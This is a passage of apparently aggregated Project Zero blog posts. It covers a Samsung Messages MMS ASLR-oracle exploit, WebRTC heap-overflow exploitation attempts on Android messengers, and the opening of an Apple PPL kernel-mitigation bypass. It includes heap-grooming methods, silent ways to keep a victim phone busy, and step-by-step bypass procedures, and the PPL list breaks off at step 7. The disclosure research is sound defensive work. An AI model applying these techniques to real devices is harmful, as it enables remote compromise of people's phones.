The carriers I have experimented with have a default expiration period of 48 hours, and it can be manually adjusted with the X-Mms-Expiry header to values between 1 minute and 48 hours. In my exploit, I didn't use the expiration aspect at all, and simply assumed that Samsung Messages crashed if the delivery report was not received within 30 seconds of sending the message. This completes the construction of a functional MMS-based ASLR oracle, which is an essential building block of a generic ASLR bypass logic discussed in the next blog post in the series.
Further thoughts on oracle reliability
The reliability of the presented ASLR oracle scheme is generally high, provided that both the sender and recipient devices maintain good connectivity with the MMSC. The weakest link is by far the android::Bitmap memory corruption primitive, which relies on two subsequent 160-byte jemalloc allocations being adjacent in memory. This generally holds true, but we have no guarantee that the condition will be always met, especially since the relevant jemalloc bin (chunks between 129-160 bytes in size) is not particularly quiet and is also utilized for other unrelated objects by the Samsung Messages app. Needless to say, any ASLR bypass logic we devise will most likely assume 100% accuracy of the oracle output, so we have to put some extra effort to make sure that the oracle can be indeed relied upon.
One simple technique we can use to improve the reliability of the attack is to have each oracle MMS processed with a relatively clean state of the heap. This can be accomplished by unconditionally crashing the client app with a malformed Qmage file, causing the process to be killed and restarted from scratch when the next message arrives on the phone. Of course the ASLR oracle output false already implies a crash taking place, so extra artificial crashes are only needed at the very beginning of the attack (before the first oracle query), and after each query returning true. The type of the artificial crash doesn't matter as long as it always reproduces; it can be a huge out-of-bounds read/write, a NULL pointer dereference, assertion failure, or any condition that doesn't depend on the existing state of the process to trigger a crash. In my exploit, I used the signal_sigsegv_400357fc6c_7014_c1d4fedf1cbcdd583e0f331f32df1f72.qmg sample from crash 39b052a01c99f60982ec92f8d01a5401, which accesses a NULL pointer returned by a malloc call with a negative integer passed as the size.
This one trick allowed me to achieve an oracle accuracy rate of more than 99% (loose estimate) on my Galaxy Note 10+ test device. In my case, it was sufficient to completely rely on each single measurement to successfully defeat ASLR without making any mistakes during the process, but your mileage may vary depending on the device model, Android version, existing history of messages in the SMS app, or even specific options enabled on the phone (such as WiFi) during the attack. If the oracle accuracy drops below a certain threshold, it may be necessary to introduce redundant memory probes sent to the target for each tested address range, and only return the output value to the higher levels of the exploit code once there is enough confidence about its validity.
ActivityManager and crash rate limiting on Android
Based on what we know so far, we can assume that any potential attack will involve a number of crashes of Samsung Messages on the victim phone, some of them carrying address space information and some triggered simply to reset the heap. The ability to continuously crash and have an app restarted on a remote device is a crucial requirement, so we should verify that this is actually possible on Android. If we send corrupted Qmages via MMS twice in a short span of time, we will observe two crashes, as expected:
d2s:/data/local/tmp $ logcat -b crash -v time
07-23 15:52:45.549 F/libc    ( 8930): Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x0 in tid 10606 (pool-5-thread-1), pid 8930 (droid.messaging)
[...]
07-23 15:52:55.517 F/libc    (10727): Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x0 in tid 10776 (pool-5-thread-1), pid 10727 (droid.messaging)
[...]
If we then send a third message, Samsung Messages won't be spawned to handle it. Instead, we'll see the following message:
07-23 15:54:28.639 23268 23317 W BroadcastQueue: Unable to launch app for broadcast Intent { act=android.provider.Telephony.WAP_PUSH_DELIVER typ=application/vnd.wap.mms-message flg=0x18000010 (has extras) }: process is bad
At this point, we (as the attacker) are cut off from the device and cannot reach or interact with the remote Qmage attack surface anymore. In fact, the victim won't be able to receive SMS/MMS from anyone until they manually start the Messages app again. So what happened here, and does it mean that all our efforts up to this point were in vain?
When I first saw the warning, I immediately went looking for clues in the Android source code. It was easy to locate the culprit based on the "process is bad" string: it is printed out when a call to mService.startProcessLocked fails. This may generally only happen when mService.mAppErrors.isBadProcessLocked returns true for the app in question:
boolean isBadProcessLocked(ApplicationInfo info) {
    return mBadProcesses.get(info.processName, info.uid) != null;
}
There is a list of bad processes in the system, but how does an app end up on that list? The answer can be found in the handleAppCrashLocked method, and specifically in the following lines (slightly reformatted for readability):
if (crashTime != null && now < crashTime + ProcessList.MIN_CRASH_INTERVAL) {
    // The process crashed again very quickly.
    // If it was a bound foreground service, let's try to restart again in a
    // while, otherwise the process loses!
    Slog.w(TAG, "Process " +
            + " has crashed too many times: killing!");
[...]
           mBadProcesses.put(, app.uid,
                    new BadProcessInfo(now, shortMsg, longMsg, stackTrace));
In the above snippet, now is the current timestamp and crashTime is the time of the last crash of the app. Accordingly, the logic checks if two crashes in a single app have occurred in a short period of time, and if so, it bans the process indefinitely from future restarts. How short is short? Let's look up the MIN_CRASH_INTERVAL constant in ProcessList:
// The minimum time we allow between crashes, for us to consider this
// application to be bad and stop and its services and reject broadcasts.
static final int MIN_CRASH_INTERVAL = 60 * 1000;
It's 60 seconds. From the attacker's point of view, this is certainly not perfect, but also not terribly bad. This logic of the ActivityManager service means that at no point should we trigger two crashes of the Messages app within one minute of each other, or the attack will be halted. In the context of our ASLR oracle, it limits the probing rate to one query a minute, which may or may not be acceptable depending on how many queries are required to break ASLR. For example, if we consider a realistic attack to be carried out during the night, that leaves us with a maximum of 8 hours × 60 minutes ~= 480 queries. The good news (for exploitation) is that there is no absolute limit on the number of crashes for one app, and we can interact with the MMS client indefinitely as long as we slow down the communication to meet the crash interval condition.
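The rate limit can be captured in a few lines. The following Python sketch is a toy model of the check quoted above, not the real ActivityManager code: the class and function names are hypothetical, and only the 60 * 1000 constant and the comparison itself come from the snippets.

```python
MIN_CRASH_INTERVAL_MS = 60 * 1000  # value of ProcessList.MIN_CRASH_INTERVAL


class CrashTracker:
    """Toy model of the bad-process check (hypothetical, simplified)."""

    def __init__(self):
        self.last_crash_ms = None  # time of the previous crash, if any
        self.bad = False           # True once the process is banned

    def on_crash(self, now_ms: int) -> bool:
        """Record a crash; return True if the app may still be restarted."""
        if (self.last_crash_ms is not None
                and now_ms < self.last_crash_ms + MIN_CRASH_INTERVAL_MS):
            self.bad = True  # second crash came too quickly
        self.last_crash_ms = now_ms
        return not self.bad


def max_queries(hours: float) -> int:
    """Upper bound on crashes (one per interval) in the given time window."""
    return int(hours * 3600 * 1000) // MIN_CRASH_INTERVAL_MS


tracker = CrashTracker()
print(tracker.on_crash(0))        # first crash is tolerated
print(tracker.on_crash(60_000))   # exactly one interval later: still fine
print(tracker.on_crash(70_000))   # only 10 seconds later: process is bad
print(max_queries(8))
```

Because the comparison is a strict "less than", a crash that lands exactly one interval after the previous one is still accepted in this model.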
The diagram below illustrates the high-level process of safely sending two ASLR oracle queries to a target phone, taking the mandatory cooldown period into account. The first query returns true and takes two MMS to complete (one probe and one unconditional crash), and the second one returns false. Note how there is always a guaranteed 60 second gap between two subsequent crashes on the recipient device:
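The same sequence can be written down as a small scheduling routine. This is a Python sketch under simplifying assumptions: crashes are treated as happening at the moment an MMS is sent, times are counted on the clock used by the crash limiter, and the 30-second SETTLE wait for a delivery report is a hypothetical parameter chosen for illustration.

```python
from typing import List, Tuple

COOLDOWN = 60  # seconds that must separate two crashes (MIN_CRASH_INTERVAL)
SETTLE = 30    # hypothetical wait for the delivery report after each MMS


def schedule(results: List[bool]) -> List[Tuple[int, str, bool]]:
    """Return (send_time_s, kind, crashes) for every MMS in the attack.

    results[i] is the outcome of query i: True means the probe did not
    crash the app, False means it did.
    """
    timeline = [(0, "reset", True)]  # initial crash gives a clean heap
    last_crash = 0
    now = 0
    for survived in results:
        # A probe may crash, so it has to respect the cooldown.
        now = max(now + SETTLE, last_crash + COOLDOWN)
        timeline.append((now, "probe", not survived))
        if survived:
            # The heap is dirty now: force a crash once the report is in.
            now = max(now + SETTLE, last_crash + COOLDOWN)
            timeline.append((now, "reset", True))
        last_crash = now  # either the probe or the reset crashed at `now`
    return timeline


for entry in schedule([True, False]):
    print(entry)
```

With the inputs [True, False] the crashes in this model fall at 0, 90 and 150 seconds, so every pair of consecutive crashes is at least 60 seconds apart.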

On a closing note, there is one more important detail to consider in the crash handling logic. If we look closely at the source code of the handleAppCrashLocked method, we can notice that the timestamp is obtained through the SystemClock.uptimeMillis() API:
       final long now = SystemClock.uptimeMillis();
As the documentation states, this is not exactly the wall clock time we have assumed it to be:
uptimeMillis() is counted in milliseconds since the system was booted. This clock stops when the system enters deep sleep (CPU off, display dark, device waiting for external input), but is not affected by clock scaling, idle, or other power saving mechanisms. This is the basis for most interval timing such as Thread#sleep(long), Object#wait(long), and System#nanoTime. This clock is guaranteed to be monotonic, and is suitable for interval timing when the interval does not span device sleep. Most methods that accept a timestamp value currently expect the uptimeMillis() clock.
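To make the distinction concrete, here is a small Python model of a clock that, like uptimeMillis(), only advances while the device is awake. It is a sketch for illustration only: the class and its methods are hypothetical, and the 60-second interval is the MIN_CRASH_INTERVAL value discussed earlier.

```python
class UptimeClock:
    """Toy clock that pauses during deep sleep, unlike wall-clock time."""

    def __init__(self):
        self.wall_ms = 0    # real elapsed time
        self.uptime_ms = 0  # time as seen by the crash limiter

    def elapse(self, ms: int, awake: bool) -> None:
        """Let `ms` milliseconds pass; uptime only counts while awake."""
        self.wall_ms += ms
        if awake:
            self.uptime_ms += ms


def cooldown_over(clock: UptimeClock, last_crash_uptime_ms: int,
                  interval_ms: int = 60 * 1000) -> bool:
    """True once a full crash interval has passed on the uptime clock."""
    return clock.uptime_ms >= last_crash_uptime_ms + interval_ms


clock = UptimeClock()
clock.elapse(120_000, awake=False)  # two minutes asleep
print(cooldown_over(clock, 0))      # cooldown has not even started
clock.elapse(60_000, awake=True)    # one minute of activity
print(cooldown_over(clock, 0))
```

In this model, two minutes of wall-clock time spent asleep contribute nothing towards the cooldown, while one minute of activity satisfies it.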
According to my experimentation on the Galaxy Note 10+ device, when the phone is in an inactive state (e.g. set aside on a bedside table with the display off), the clock indeed doesn't progress. This makes practical zero-click exploitation even more challenging, as it is not enough to just wait for 60 seconds before sending the next MMS. Instead, the attacker has to keep the target phone somehow occupied for those 60 seconds, while not triggering any vibration/notification sounds at the same time. The most obvious way to achieve this is through the cellular network, and I have identified at least three techniques that could be used to silently and remotely keep a phone busy:
  • By sending an MMS with empty text (i.e. an empty text/plain MIME file), a few seconds can be wasted while the phone receives and processes the message. In the end, the empty text leads to an unhandled Java exception being thrown in the Messages app, preventing it from showing any notification to the user. I abused this behavior in my exploit to send an initial "ping" to quietly verify that the recipient phone is responsive (see 0:43-0:56 in the exploit demo). It has been fixed in Samsung Messages since version
  • By sending an MMS with very long text (at least around 140 kB in my testing), a few seconds can be similarly wasted by the victim phone. In this corner case, the misbehavior is slightly different and varies between devices, as the unhandled Java exception is thrown in the midst of generating a user notification, when it is already displayed on the screen, but before the notification sound rings. As such, it also qualifies as a (literally) silent CPU cycle burning trick.
  • By sending a very long SMS of 5180+ characters, which is divided into 34 segments of 153 characters each. The target phone starts receiving the SMS segments, roughly one per second, but for some reason (I didn't investigate this deeply) it stops reassembling the message after the 33rd part, and abandons it completely without generating any notifications. During the process of receiving and saving the initial portions of the SMS in the internal database, the uptimeMillis clock progresses by around 35 seconds in my test setup.

These are some basic ideas for ways to transmit data to the phone such that it has to spend cycles processing it, but fails at some point before notifying the owner. I am sure many more similar techniques exist, and specialized software such as NowSMS certainly helps put the relevant mobile apps to the test against very unusual conditions. All in all, the nature of the uptimeMillis clock is not a fundamental barrier in remote Android exploitation, but it is an annoying aspect that needs to be addressed with the use of additional techniques, and it may extend the overall attack time and impair its reliability. With 60 seconds of active CPU time required between each ASLR oracle query, we might also start being concerned about the extent of power consumption induced by the exploit on target phones with low battery levels… :)
Summary
In this episode, we set up an environment to programmatically send MMS messages from a Windows PC, and learned the basics of the client ⟷ MMSC MM1 protocol and its encapsulation encoding. This enabled us to specify the X-Mms-Delivery-Report header in outgoing messages, and abuse the delivery report feature to establish a 1-bit side channel indicating if the recipient's Messages app crashed while processing our malformed Qmage image or not. Based on this capability and the address-probing primitive built in Part 3, we now have a fully functional (albeit somewhat slow) ASLR oracle at our disposal. We are getting close to defeating ASLR and finally executing arbitrary code.
To make further progress in the research, we have to face a few remaining questions:
  • What types of addresses are we interested in leaking? Which libraries will be needed to achieve RCE, and do we also need to disclose any data locations?
  • How do we find any regions in memory at all, starting with absolutely no initial insight as to where they might be located?
  • Finally, how do we achieve this in a relatively small number of steps (preferably low hundreds), such that the attack has a realistic execution time?

All of these matters will be discussed in detail in the upcoming Part 5. Stay tuned!
Category: Hacking & Security

Exploiting Android Messengers with WebRTC: Part 1

3 August, 2020 - 19:40
Posted by Natalie Silvanovich, Project Zero

This is a three-part series on exploiting messenger applications using vulnerabilities in WebRTC. This series highlights what can go wrong when applications don't apply WebRTC patches and when the communication and notification of security issues breaks down. Part 2 is scheduled for August 5 and Part 3 is scheduled for August 6.
Part 1: First Attempts
WebRTC is an open source video conferencing solution used by a variety of software including browsers, messaging clients and streaming services. While Project Zero has reported several vulnerabilities in WebRTC in the past, it was not clear whether these bugs were exploitable, especially outside of browsers. I investigated whether two recent bugs are exploitable in popular Android messaging applications.
The Bugs
I started off by trying to exploit two bugs, CVE-2020-6389 and CVE-2020-6387.
Both of these vulnerabilities are in WebRTC’s Real-time Transport Protocol (RTP) processing. RTP is the protocol WebRTC uses to transport audio and video content from peer to peer. RTP supports extensions, which are extra pieces of data that can be included in each packet to tell the destination peer how to display or process the data. For example, there is an extension that contains information about the screen orientation of the sending device, and one that contains the volume level. Both of these vulnerabilities occurred in extensions that had been implemented in WebRTC in 2019.
CVE-2020-6389 occurred in the frame marking extension, which contains information on how video content is split into frames. The bug is in how it processes layer information: WebRTC only supports five layers, but the layer number is a three-bit field in the extension, which means it can go as high as seven. This leads to an out-of-bounds write in the following code. temporal_idx is set from the layer number in the extension. 
if (layer_info_it->second[temporal_idx] != -1 &&
    AheadOf<uint16_t>(layer_info_it->second[temporal_idx], frame->id.picture_id)) {
  // Not a newer frame. No subsequent layer info needs update.
  break;
}
...
layer_info_it->second[temporal_idx] = frame->id.picture_id;
The final line of code is where the out-of-bounds write occurs, as the array only contains five elements. This bug also has some limitations not obvious from the above code. To start, there is a check before the write that tests whether the current value of the memory, cast to a 16-bit unsigned integer, is more than the current sequence number. The write only occurs if this is true. Practically, this wasn’t much of a limitation; a crash usually occurred after two or three attempts when I tested it. A more serious limitation is that the layer_info_it->second field has a 64-bit integer type, but frame->id.picture_id is a 16-bit integer. This means that while this bug allows an attacker to write up to three 64-bit integers outside of a fixed size heap buffer, the values that can be written are very limited, and are too small to represent pointers.
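The arithmetic behind these limits is easy to check. The Python sketch below only restates the numbers from the description above (five elements, a three-bit index, 64-bit slots); the variable names are hypothetical, and the zero-extension in written_value assumes the picture id is treated as an unsigned 16-bit quantity.

```python
LAYERS = 5       # elements in the per-layer array
FIELD_BITS = 3   # width of the layer number in the extension
SLOT_BYTES = 8   # each element is a 64-bit integer

possible = range(1 << FIELD_BITS)            # every index the field can encode
oob = [i for i in possible if i >= LAYERS]   # indices past the end of the array
oob_bytes = len(oob) * SLOT_BYTES            # bytes reachable past the buffer


def written_value(picture_id: int) -> int:
    """A 16-bit id widened to 64 bits: the upper 48 bits stay zero."""
    return picture_id & 0xFFFF


print(oob, oob_bytes)
print(hex(written_value(0x12345)))
```

The largest value that can be written is 0xFFFF, which is why the overwritten slots can never hold a plausible heap or code pointer.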
CVE-2020-6387 is a bug in how the video timing extension is processed by Forward Error Correction (FEC). FEC copies incoming RTP packets, and then clears certain extensions when attempting to correct errors. This vulnerability occurs because extensions of the video timing type are not verified to be of the expected length before they are cleared. The code causing this bug is as follows:
case RTPExtensionType::kRtpExtensionVideoTiming: {
  // Nullify 3 last entries: packetization delay and 2 network timestamps.
  // Each of them is 2 bytes.
  uint8_t* p = WriteAt(extension.offset) + VideoSendTiming::kPacerExitDeltaOffset;
  memset(p, 0, 6);
  break;
}
The value of VideoSendTiming::kPacerExitDeltaOffset is 7, so this code writes six zeros from offset 7 to offset 13 from the start of the extension in the packet. However, there is no check that the extension data is more than 13 bytes long, or even that the packet has this number of bytes left. The result of this bug is that an attacker can write up to six zeros to the heap at an offset of up to seven bytes from a variable sized heap buffer. This bug is better than CVE-2020-6389 in some ways and worse in others. It is better in that the heap buffer that can be overflowed is variable size, which gives a lot more options of what can be overwritten by this bug on the heap. The offset also offers some flexibility on where the zeros are written, and the write does not have to be aligned, whereas CVE-2020-6389 requires 64-bit alignment. This bug is worse in that the value written has to be zero, and the size of the area that can be written is smaller (six bytes versus 24).
Moving the Instruction Pointer
I started off by seeing if it was possible to use either of these bugs to move the instruction pointer. Modern Android uses jemalloc, a slab allocator which doesn’t use inline heap headers, so corrupting heap metadata was not an option. Instead, I compiled WebRTC for Android with symbols, and loaded it in IDA. I then went through the available object types to see if there was anything that could obviously be used to move the instruction pointer or improve the capabilities of the bug. I didn’t find anything.
I thought maybe I could use CVE-2020-6389 to overwrite a length and cause a larger overflow, but this had some problems. To start, the bug writes a 64-bit integer, meanwhile a lot of length fields are 32-bit integers, which means the write also overwrites something else, and can only write a non-zero value if the length is 64-bit aligned. The location of the bug in processing is also problematic, as it does the overwrite near the end of the incoming packet being processed, meaning that many objects are not accessed again after this point, so any overwritten memory would never be used again. CVE-2020-6389 also overwrites a heap buffer of fixed size 80, which limits the object types that can be affected by this bug. I didn’t think CVE-2020-6387 would be viable for this purpose either, as it can only write zeros, which can only make a length smaller.
I wasn’t sure where to go at this point, so I triggered CVE-2020-6389 a few dozen times on Android to see if there were any crashes at an address wider than 16 bits, hoping they might give me ideas of ways that this bug could influence the behavior of the code other than overwriting a pointer with an invalid 16-bit value. To my surprise, about one in 20 times it crashed with the instruction pointer set to a value that had clearly been read off the heap.
Analyzing the crash, it turned out that a StunMessage object was being allocated after the overflowed region. The members of the StunMessage class are as follows.
protected:
  std::vector<std::unique_ptr<StunAttribute>> attrs_;
  ...
private:
  ...
  uint16_t type_;
  uint16_t length_;
  std::string transaction_id_;
  uint32_t reduced_transaction_id_;
  uint32_t stun_magic_cookie_;
So after the vtable, the first member is a vector. How are vectors laid out in memory? It turns out its first two members are as follows.
  pointer __begin_;
  pointer __end_;
These pointers point to the beginning and the end of the vector’s contents in memory. During the crash, the __end_ member was overwritten with a small 16-bit integer. Vector iteration works by starting at the __begin_ pointer and incrementing until the  __end_ pointer is reached, so this change means that the next time the vector is iterated over, usually in the destructor, it will go out of bounds. Since this vector contains virtual objects of type StunAttribute, it will perform a virtual call to each element, to call its destructor. This virtual call on out-of-bounds memory was what was moving the instruction pointer.
This seemed like a reasonable way to control the instruction pointer, except for one problem: in a typical configuration, it is not possible for an attacker at one end of a WebRTC connection to send STUN to the user at the other, instead they each communicate with their own STUN server. I asked Philipp Hancke of webrtchacks if he knew of a way. He suggested this method, which involves specifying a TCP server controlled by the attacker as a potential routable path between two peers, called an ICE candidate. Both the attacker and target device will then communicate through this server, including STUN messages.
This allowed me to send STUN messages with an unusually large number of attributes. This was necessary because in order to control the instruction pointer, I would need to be able to control what showed up in memory after the STUN attribute vector. jemalloc allocates similar sized allocations, determined by predefined size classes in contiguous memory runs. The less used a size class is, the more likely it is that two objects of the same size class will be allocated one after the other. 
Typically, STUN messages have a small number of attributes, which translates to a vector buffer size of 32 or 64 bytes, which are both very frequently used size classes. Instead, I sent STUN messages with 128 attributes, which translated to a vector buffer size of 1024 bytes, which happens to be an infrequently used size class in WebRTC. By sending many STUN messages with this number of attributes, while at the same time sending RTP packets of size 1024 containing the desired pointer value, interspersed with packets containing the bug, I was able to get a virtual call on that pointer value about one in five times. This was good enough for use in an exploit, and I decided to move on to breaking ASLR.
Breaking ASLR
There were two possible approaches for breaking ASLR in this exploit. One was to use one of the above bugs to read memory and send it back to the attacker device or TCP server somehow, the other was to use some sort of crash oracle to determine the memory layout.
I started off by seeing whether it was possible to use one of the bugs to read memory remotely from the target device. Mark Brand suggested that it might be possible to use CVE-2020-6387 to accomplish this by setting the low bytes of a pointer to outgoing data to zero, causing out-of-bounds data to be sent instead of the actual data. This seemed like a promising approach, so I used IDA to look for potential objects.
It turned out there were quite a few, and they all had problems. I spent some time on SendPacketMessageData and DataReceivedMessageData. These objects are used to store pointers to outgoing RTP data while it is queued. They contain a CopyOnWriteBuffer object, and its first member is a ref-counted pointer to an rtc::Buffer object. It was possible to set the bottom bytes of this pointer to be zero using CVE-2020-6387. Unfortunately, the structure of rtc::Buffer made revealing memory this way challenging.
RefCountedObject vtable;
size_t size_;
size_t capacity_;
std::unique_ptr<T[]> data_;
I was hoping that it would be possible to make the clipped pointer to this structure point to some other object on the heap that had a pointer in the location of the data_ pointer, so that data would get sent instead. However, it turned out that in the process of sending data, all four members of the object above get accessed and need to be reasonably valid. I went through all the available objects in the same size class as the rtc::Buffer class, but couldn’t find one with these exact properties.
I then considered that instead of using a different object, I could use an rtc::Buffer object that had already been freed, with a specific backing buffer size that could be replaced with an object containing pointers using heap manipulation. This didn’t work out either. This was largely an issue of reliability. To start off, an rtc::Buffer object is 36 bytes, which translates to size class 48 in jemalloc, meaning 48 bytes get allocated. Imagining some contiguous allocations of this type, the addresses would be as follows.
0x[...]0000      buffer 0
0x[...]0030      buffer 1
0x[...]0060      buffer 2
0x[...]0090      buffer 3
0x[...]00c0      buffer 4
0x[...]00f0      buffer 5
0x[...]0120      buffer 6
...
If the lowest byte of the pointer to any of buffers 0 through 5 is set to zero by the vulnerability, it will land on a valid buffer, but if the pointer to buffer 6 is clipped, it will not, because 256 is not a multiple of 48. The end result is that every time the bug hits the SendPacketMessageData object, there is only roughly a one in three chance it will end up pointing to a valid rtc::Buffer. Hitting the object in the first place is also unreliable, because there are many other allocations of a similar size being made by WebRTC. It’s possible to increase the number of these objects on the heap, and the amount of time before they are sent, by using the TCP server to make the connection very slow, but even then I could only hit the structure less than 10% of the time. Having to manipulate the heap so that there are many freed rtc::Buffer objects in a row in the first place, and so that the backing has been replaced by something containing pointers, added even more unreliability. I eventually abandoned this approach because I didn’t think I could get it reliable enough to use in an exploit with a reasonable amount of effort, though I think it’s probably possible. The crash behavior of the application being attacked also matters a lot. This would probably work on an application that respawns immediately in the case of a crash, but would be a lot less practical on an application that stops respawning unless there is a certain delay, which is common on Android.
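The alignment argument can be checked with a short calculation. The Python sketch below models the idealised layout from the table above, with buffer 0 at an address whose low bytes are zero and every following buffer 48 bytes later; the function names are hypothetical.

```python
SIZE_CLASS = 48  # jemalloc size class used for a 36-byte rtc::Buffer


def clipped(addr: int) -> int:
    """Address after the bug zeroes its least significant byte."""
    return addr & ~0xFF


def lands_on_buffer(index: int, base: int = 0) -> bool:
    """True if clearing the low byte of buffer `index` yields a buffer start."""
    addr = base + index * SIZE_CLASS
    return (clipped(addr) - base) % SIZE_CLASS == 0


# The pattern repeats every 768 bytes (the least common multiple of 48
# and 256), which is 16 buffers.
valid = [i for i in range(16) if lands_on_buffer(i)]
print(valid, len(valid) / 16)
```

In this model only the six buffers in the first 256-byte window survive the clipping, so 6 out of every 16 pointers (37.5%) end up on a valid buffer, in line with the rough one in three estimate.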
I also looked a lot at how outgoing packets are generated by WebRTC, especially RTP Control Protocol (RTCP), which a peer always sends, even if it is just receiving audio or video. However, most outgoing packets are generated on the stack, so it is not possible to alter them using heap corruption bugs.
I also considered using a crash oracle to break ASLR, but I felt it was unlikely to succeed with these specific bugs. To start, hitting a heap allocation with them is unreliable, so it would be difficult to tell whether a crash had occurred due to a specific condition, or just because the bug had failed. I was also unsure whether it would even be possible to create detectable conditions considering the limited capabilities of these bugs.
I also thought about using CVE-2020-6387 to alter a vtable or a function pointer in order to read memory, cause behavior detectable by a crash oracle or perform offset-based exploitation that doesn’t require ASLR to be broken. I decided not to pursue this path, because the end result would depend on which functions and vtables are loaded at locations ending in zero, which varies greatly between builds. An exploit written using this method would require a large amount of modification to work on even slightly different versions of WebRTC, and there is no guarantee it would work at all.
I decided at this point that I needed to look for new bugs that could break ASLR, as neither of the ones I’d found recently could do it easily.
Stay tuned for Part 2: A Better Bug, which is scheduled for Wednesday, August 5.
Category: Hacking & Security

The core of Apple is PPL: Breaking the XNU kernel's kernel

31 July, 2020 - 18:19
Posted by Brandon Azad, Project Zero
While doing research for the one-byte exploit technique, I considered several ways it might be possible to bypass Apple's Page Protection Layer (PPL) using just a physical address mapping primitive, that is, before obtaining kernel read/write or defeating PAC. Given that PPL is even more privileged than the rest of the XNU kernel, the idea of compromising PPL "before" XNU was appealing. In the end, though, I wasn't able to think of a way to break PPL using the physical mapping primitive alone.
PPL's goal is to prevent an attacker from modifying a process's executable code or page tables, even after obtaining kernel read/write/execute privileges. It does this by leveraging APRR to create something of a "kernel inside the kernel" that protects page tables. During normal kernel execution, page tables and page table metadata are read-only, and code that modifies page tables is non-executable; the only way for the kernel to modify page tables is to enter PPL by calling a "PPL routine", which is analogous to a syscall from XNU into PPL. This limits the entry points into the kernel code that can modify page tables to just those PPL routines.
I considered several ideas to bypass PPL using the one-byte technique's physical mapping primitive, including mapping page tables directly, mapping a DART to allow modifying physical memory from a coprocessor, and mapping the I/O addresses used to control clock gating to power down certain components of the system. Unfortunately, none of these ideas panned out.
However, it's not the Project Zero way to leave any mitigation unbroken. So, having exhausted my search for design flaws, I returned to the ever-faithful technique of memory corruption. Sure enough, decompiling a few PPL functions in IDA was sufficient to find some memory corruption.
Some memory corruption in pmap_remove_options_internal(). Using a kernel function calling primitive, both va_start and size are controlled.
The function pmap_remove_options_internal() is a PPL routine, one of the "PPL syscalls" from the XNU kernel to the even more privileged PPL. It is called by invoking pmap_remove_options() in XNU, which validates arguments and then calls pmap_remove_options_internal() in PPL. Its purpose is to unmap the supplied virtual address range from the physical memory map (pmap) of a process.
MARK_AS_PMAP_TEXT static int
pmap_remove_options_internal(
        pmap_t pmap,
        vm_map_address_t start,
        vm_map_address_t end,
        int options)
The actual work of removing the translation table entries (TTEs) that map the supplied virtual address range is done by calling pmap_remove_range_options(), which takes pointers to the beginning and end of the TTE range to remove from the level 3 (leaf) translation table.
static int
pmap_remove_range_options(
        pmap_t pmap,
        pt_entry_t *bpte,   // The first L3 TTE to remove
        pt_entry_t *epte,   // The end of the TTEs
        uint32_t *rmv_cnt,
        int options)
Unfortunately, when pmap_remove_options_internal() calls pmap_remove_range_options(), it seems to assume that the supplied virtual address range will not cross an L3 translation table boundary, because if it does then the calculated TTE range will span out-of-bounds memory:
remove_count = pmap_remove_range_options(
                   pmap,
                   &l3_table[(va_start >> 14) & 0x7FF],
                   (u64 *)((char *)&l3_table[(va_start >> 14) & 0x7FF]
                         + ((size >> 11) & 0x1FFFFFFFFFFFF8LL)),
                   &rmv_spte,
                   options);
This means that if we have an arbitrary kernel function calling primitive, we can invoke the PPL-entering wrapper function directly and get pmap_remove_options_internal() called with an improper virtual address range, which makes pmap_remove_range_options() try to remove "TTEs" read from out-of-bounds memory while in PPL mode. And since the removed TTEs are zeroed out, this means that we can corrupt PPL-protected memory.
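To make the out-of-bounds condition concrete, here is a minimal sketch of the index arithmetic. It assumes 16 KB pages and 2048 eight-byte entries per L3 table, which is what the `>> 14` and `& 0x7FF` in the decompiled call imply. The names `l3_range`, `l3_range_for`, and `l3_range_is_oob` are hypothetical helpers for illustration, not XNU functions.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define PAGE_SHIFT_16K 14u    /* 16 KB pages, from the ">> 14" above */
#define L3_ENTRIES     2048u  /* entries per L3 table, from "& 0x7FF" */

/* Hypothetical helper type: the half-open TTE index range [first, end). */
struct l3_range {
    uint64_t first;
    uint64_t end;
};

/* Mirror the arithmetic of the decompiled call: the first index is reduced
 * modulo the table size, but the end is simply first + number of pages. */
static struct l3_range l3_range_for(uint64_t va_start, uint64_t size)
{
    struct l3_range r;

    /* This sketch only models page-aligned sizes. */
    assert((size & ((1ull << PAGE_SHIFT_16K) - 1)) == 0);

    r.first = (va_start >> PAGE_SHIFT_16K) & (L3_ENTRIES - 1u);
    r.end = r.first + (size >> PAGE_SHIFT_16K);
    return r;
}

/* True if the range runs past the last entry of the L3 table. */
static bool l3_range_is_oob(struct l3_range r)
{
    return r.end > L3_ENTRIES;
}
```

For example, `l3_range_for(0x1FFC000, 0x8000)` starts at the last entry of the table (index 2047) and ends at index 2049, so the second "TTE" lies one entry past the end of the table.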

But zeroing out-of-bounds TTEs would be a rather annoying primitive to try and leverage for a PPL bypass. Much of the data we'd like to corrupt has probably already been allocated far away from our page tables, and PPL isn't a large enough code base that we're guaranteed to find something interesting we can do just by zeroing memory. And that's to say nothing of the accounting in PPL that would probably detect an attempt to unmap non-existent TTEs!
So instead I chose to focus on a side effect of this out-of-bounds processing: improper TLB invalidation.
Later on in pmap_remove_options_internal(), after the TTEs have been removed, the translation lookaside buffer (TLB) needs to be invalidated in order to ensure that the process cannot continue to access the unmapped pages through stale TLB entries.
    flush_mmu_tlb_region_asid_async(va_start, size, pmap);
This TLB flush occurs on the supplied virtual address range, not the removed TTEs. Thus, there could be a disagreement between the TLB entries invalidated and the L3 TTEs removed if the out-of-bounds TTEs were from a separate region of the process's address space, leaving stale TLB entries for those out-of-bounds TTEs.

A stale TLB entry would allow a process to continue accessing the physical page after that page has been unmapped and potentially reused for page tables. So if we had a stale TLB entry for an L3 translation table, then we could insert L3 TTEs to map arbitrary PPL-protected pages as writable.
That's pretty much exactly how the PPL bypass works:
  1. Call the kernel function cpm_allocate() to allocate 2 pages of contiguous physical memory called A and B.
  2. Call pmap_mark_page_as_ppl_page() to insert pages A and B at the head of the ppl_page_list so they can be reused for page tables.
  3. Fault in pages for virtual addresses P and Q so that A and B are allocated as L3 TTs for mapping P and Q, respectively. P and Q are discontiguous but have TTEs that are contiguous.
  4. Start a spinner thread bound to a CPU core that reads from page Q in a loop to keep the TLB entry alive.
  5. Call pmap_remove_options() to remove 2 pages starting from virtual address P (which does not include Q). The vulnerability means that TTEs for both P and Q are removed, but only the TLB entry for P is invalidated.
  6. Call pmap_mark_page_as_ppl_page() to insert page Q at the head of the ppl_page_list so it can be reused for page tables.
  7. Fault in a page for virtual address R so that page Q is allocated as an L3 TT for R, even while we continue to have a stale TLB entry for Q.
